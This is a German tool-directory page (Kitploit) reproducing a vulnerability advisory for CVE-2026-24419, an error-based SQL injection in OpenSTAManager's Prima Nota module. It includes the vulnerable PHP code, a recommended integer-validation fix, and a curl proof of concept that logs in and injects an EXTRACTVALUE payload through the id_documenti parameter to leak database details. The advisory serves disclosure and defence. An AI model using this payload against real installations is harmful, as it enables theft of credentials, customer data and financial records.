Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-24419 — CVE-2026-24419 - OpenSTAManager weist eine SQL-Injection im Modul Prima Nota auf. | Kitploit
Tools/GitHubGitHub/lukasz-rybak/cve-2026-24419
SchwachstellenanalyseWebanwendungs-ExploitationPenetrationstestsPapers & ForschungLernen & Bildung
GitHublukasz-rybak/cve-2026-24419

CVE-2026-24419

CVE-2026-24419 - OpenSTAManager weist eine SQL-Injection im Modul Prima Nota auf.

Repository anzeigen
vor 4 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-24419: OpenSTAManager weist eine SQL-Injection im Modul Prima Nota auf

Übersicht

FeldDetails
CVE-IDCVE-2026-24419
SchweregradHIGH
SicherheitshinweisSicherheitshinweis ansehen
Entdeckt vonLukasz Rybak

Betroffene Produkte

  • devcode-it/openstamanager (Versionen: <= 2.9.8)

CWE-Klassifizierung

  • CWE-89: Unsachgemäße Neutralisierung spezieller Elemente in einem SQL-Befehl ('SQL Injection')

Details

Zusammenfassung

Eine kritische fehlerbasierte SQL-Injection-Schwachstelle (Error-Based SQL Injection) im Modul Prima Nota (Journalbuchung) von OpenSTAManager v2.9.8 ermöglicht es authentifizierten Angreifern, vollständige Datenbankinhalte – einschließlich Benutzeranmeldedaten, personenbezogener Kundendaten (PII) und Finanzunterlagen – über XML-Fehlermeldungen zu extrahieren, indem sie bösartigen SQL-Code in URL-Parameter injizieren.

Status: ✅ Bestätigt und an einer Live-Instanz getestet (v2.9.8) Verwundbare Parameter: id_documenti (GET-Parameter) Betroffener Endpunkt: /modules/primanota/add.php Angriffstyp: Fehlerbasierte SQL-Injection (IN-Klausel)

Details

OpenSTAManager v2.9.8 enthält eine kritische fehlerbasierte SQL-Injection-Schwachstelle in der Datei add.php des Moduls Prima Nota (Journalbuchung). Die Anwendung validiert nicht, dass die durch Kommas getrennten Werte aus GET-Parametern Ganzzahlen sind, bevor sie diese in SQL-IN()-Klauseln verwendet. Dadurch können Angreifer beliebige SQL-Befehle injizieren und über XPATH-Fehlermeldungen sensible Daten extrahieren.

Verwundbarkeitskette:

  1. Einstiegspunkt: /modules/primanota/add.php (Zeilen 63–67)

    root@kitploit:~
    $id_documenti = $id_documenti ?: get('id_documenti');
    $id_documenti = $id_documenti ? explode(',', (string) $id_documenti) : [];
    

    Auswirkung: Die Funktion get() ruft benutzergesteuerte URL-Parameter ab, explode(',', (string) ...) teilt sie per Komma auf, aber KEINE Validierung stellt sicher, dass die Elemente Ganzzahlen sind.

  2. SQL-Injection-Punkt: /modules/primanota/add.php (Zeile 306)

    root@kitploit:~
    $id_anagrafica = $dbo->fetchOne('SELECT idanagrafica FROM co_documenti WHERE id IN('.($id_documenti ? implode(',', $id_documenti) : 0).')')['idanagrafica'];
    

    Auswirkung: Array-Elemente aus $id_documenti werden mithilfe von implode() direkt konkateniert, ohne Typvalidierung oder prepare(), was vollständige SQL-Injection ermöglicht.

Ursachenanalyse:

Die Schwachstelle besteht, weil:

  1. get('id_documenti') gibt benutzergesteuerte Zeichenketten zurück
  2. explode(',', (string) $value) teilt per Komma auf, validiert aber keine Typen
  3. implode(',', $array) fügt Array-Elemente direkt in SQL ein
  4. Keine Validierung stellt sicher, dass die Array-Elemente Ganzzahlen sind
  5. Angreifer können SQL injizieren, indem sie Folgendes angeben: ?id_documenti=1) AND EXTRACTVALUE(...) %23

Betroffener Codepfad:

root@kitploit:~
GET /modules/primanota/add.php?id_documenti=MALICIOUS_PAYLOAD
  ↓
add.php:63 - $id_documenti = get('id_documenti')
  ↓
add.php:64 - $id_documenti = explode(',', (string) $id_documenti) [NO TYPE VALIDATION]
  ↓
add.php:306 - WHERE id IN('.implode(',', $id_documenti).') [INJECTION POINT]

PoC

Schritt 1: Anmelden

root@kitploit:~
curl -c /tmp/cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \
  -d 'username=admin&password=admin'

Schritt 2: Schwachstelle verifizieren (fehlerbasierte SQL-Injection)

Test 1: Datenbankbenutzer und Version extrahieren

root@kitploit:~
curl -b /tmp/cookies.txt "http://localhost:8081/modules/primanota/add.php?id_documenti=1)%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20CONCAT(USER(),'%20|%20',VERSION()))))%23"

Antwort (für den Angreifer sichtbare Fehlermeldung):

root@kitploit:~
<code>SQLSTATE[HY000]: General error: 1105 XPATH syntax error: &#039;[email protected] | 8.3.0&#039;</code>
Bild

Auswirkungen

Alle authentifizierten Benutzer mit Zugriff auf das Modul Prima Nota (Journalbuchung).

Empfohlene Behebung

Primäre Behebung – Typvalidierung:

Datei: /modules/primanota/add.php

VORHER (verwundbar – Zeilen 63–67):

root@kitploit:~
$id_documenti = $id_documenti ?: get('id_documenti');
$id_documenti = $id_documenti ? explode(',', (string) $id_documenti) : [];

NACHHER (behoben):

root@kitploit:~
$id_documenti = $id_documenti ?: get('id_documenti');
$id_documenti = $id_documenti ? explode(',', (string) $id_documenti) : [];
// Validate that all array elements are integers
$id_documenti = array_map('intval', $id_documenti);
$id_documenti = array_filter($id_documenti, fn($id) => $id > 0); // Remove zero/negative IDs

Danksagung

Entdeckt von Łukasz Rybak

Referenzen

  • https://github.com/devcode-it/openstamanager/security/advisories/GHSA-4j2x-jh4m-fqv6
  • https://nvd.nist.gov/vuln/detail/CVE-2026-24419
  • https://github.com/advisories/GHSA-4j2x-jh4m-fqv6

Haftungsausschluss

Diese CVE wurde nach den Grundsätzen der koordinierten Offenlegung von Sicherheitslücken (Coordinated Vulnerability Disclosure) verantwortungsvoll offengelegt. Die hier bereitgestellten Informationen dienen ausschließlich Bildungs- und Verteidigungszwecken.

Tool herunterladen